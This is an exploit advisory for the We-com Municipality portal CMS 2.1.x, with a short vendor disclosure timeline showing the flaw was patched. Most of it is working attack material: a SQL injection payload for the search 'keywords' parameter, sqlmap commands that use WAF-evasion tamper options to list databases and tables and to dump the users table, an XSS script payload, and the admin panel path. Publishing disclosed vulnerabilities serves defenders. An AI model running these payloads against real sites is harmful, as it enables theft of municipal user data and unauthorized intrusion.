# Exploit Title: We-com Municipality portal CMS SQL Injection & XSS Vulnerability
# Google Dork:N/A
# Date: 2020-04-17
# Exploit Author: @ThelastVvV
# Vendor Homepage: https://www.we-com.it/
# Version: 2.1.x
# Tested on: 5.5.0-kali1-amd64

---------------------------------------------------------


Vendor contact timeline:


2020-05-05: Contacting vendor through  info@we-com.it
2020-05-26: A Patch is published in the versions
2020-06-01: Release of security advisory




PoC 1:
The attacker once locate the sql vulnerability in the "keywords" parameter of the portal search bar then the attacker  will be able to  perform an automated process to exploit the secruity  of Italien Municipality portal CMS 
Payload(s)

http://www.site.it/cerca/
POST Data: keywords='1'--

SQLMAP Payload(s):


sqlmap -u https://www.comune.site.it/cerca/ --data "keywords=" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs

sqlmap -u https://www.comune.site.it/cerca/ --data "keywords=" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" -D **_db --tables

sqlmap -u https://www.comune.site.it/cerca/ --data "keywords=" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dump -D **_db -T utenti


PoC 2 :

XSS Vulnerability

Payload(s) :
http://www.site.com/cerca/ 
in the search bar:
'"<script>alert(1);</script>%



Admin panel:

www.site.it/admin/